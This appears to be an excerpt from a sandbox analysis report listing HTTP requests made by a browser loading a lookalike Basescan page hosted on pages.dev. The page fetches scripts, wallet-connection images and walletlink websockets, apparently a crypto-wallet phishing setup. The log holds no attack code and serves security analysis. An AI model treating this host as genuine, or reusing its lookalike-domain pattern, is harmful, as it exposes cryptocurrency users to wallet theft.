            Source: global trafficHTTP traffic detected: GET /getWalletImage/018b2d52-10e9-4158-1fde-a5d5bac5aa00 HTTP/1.1Host: api.web3modal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /getWalletImage/45f2f08e-fc0c-4d62-3e63-404e72170500 HTTP/1.1Host: api.web3modal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rpc HTTP/1.1Host: www.walletlink.orgConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: xCPZFEU3zTsrhL6aEl2G2g==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /assets/vendor/bootstrap/bootstrap.min.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/malihu-custom-scrollbar-plugin/jquery.mCustomScrollbar.concat.min.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/cubeportfolio/js/jquery.cubeportfolio.min.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/js/components/hs.header.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /getWalletImage/68e8063a-ff69-4941-3b40-af09e2fcd700 HTTP/1.1Host: api.web3modal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/js/components/hs.malihu-scrollbar.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/js/components/hs.unfold.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/js/components/hs.focus-state.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/js/components/hs.go-to.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/js/components/hs.cubeportfolio.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/js/custom/combine-js-bottom2.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/clipboard/dist/clipboard.min.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/js/components/hs.clipboard.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /token/generic-tokentxns2?m=normal&contractAddress=0x28a5e71bfc02723eac17e39c84c5190415c0de9f&a=&sid=b9ff423ad9544d672c2bdf1610649561&p=1 HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/dist/websiteAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /assets/js/custom/commonjs_token.js?v=24.4.4.9 HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /assets/js/custom/commonjs.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/fancybox/jquery.fancybox.min.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/js/custom/web3-utils.min.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/js/custom/web3.min.js?v=0.5.2.2 HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/svg/brands/main.svg?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/main/loadingblock.svg HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: a.ixncdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/highcharts/js/v6/highcharts.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/js/custom/web3-eth.min.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/svg/brands/metamask.svg HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /jss/ace/theme-dawn.js HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /token/style.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/generic-tokentxns2?m=normal&contractAddress=0x28a5e71bfc02723eac17e39c84c5190415c0de9f&a=&sid=b9ff423ad9544d672c2bdf1610649561&p=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/840013fd8c2ab234.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/generic-tokentxns2?m=normal&contractAddress=0x28a5e71bfc02723eac17e39c84c5190415c0de9f&a=&sid=b9ff423ad9544d672c2bdf1610649561&p=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/styles.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/generic-tokentxns2?m=normal&contractAddress=0x28a5e71bfc02723eac17e39c84c5190415c0de9f&a=&sid=b9ff423ad9544d672c2bdf1610649561&p=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/loaderImage.gif HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/generic-tokentxns2?m=normal&contractAddress=0x28a5e71bfc02723eac17e39c84c5190415c0de9f&a=&sid=b9ff423ad9544d672c2bdf1610649561&p=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/config.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/generic-tokentxns2?m=normal&contractAddress=0x28a5e71bfc02723eac17e39c84c5190415c0de9f&a=&sid=b9ff423ad9544d672c2bdf1610649561&p=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /jss/ace/mode-csharp.js HTTP/1.1Host: basescan.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /token/config.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/website.html HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/generic-tokentxns2?m=normal&contractAddress=0x28a5e71bfc02723eac17e39c84c5190415c0de9f&a=&sid=b9ff423ad9544d672c2bdf1610649561&p=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /i HTTP/1.1Host: c.ixncdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /token/modules.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/generic-tokentxns2?m=normal&contractAddress=0x28a5e71bfc02723eac17e39c84c5190415c0de9f&a=&sid=b9ff423ad9544d672c2bdf1610649561&p=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/style.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/840013fd8c2ab234.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/styles.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/z0emk-akw98-t47wk.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/generic-tokentxns2?m=normal&contractAddress=0x28a5e71bfc02723eac17e39c84c5190415c0de9f&a=&sid=b9ff423ad9544d672c2bdf1610649561&p=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /rpc HTTP/1.1Host: www.walletlink.orgConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: ynJBB8BuJUeu1Ge4AXHB1w==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /token/modules.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
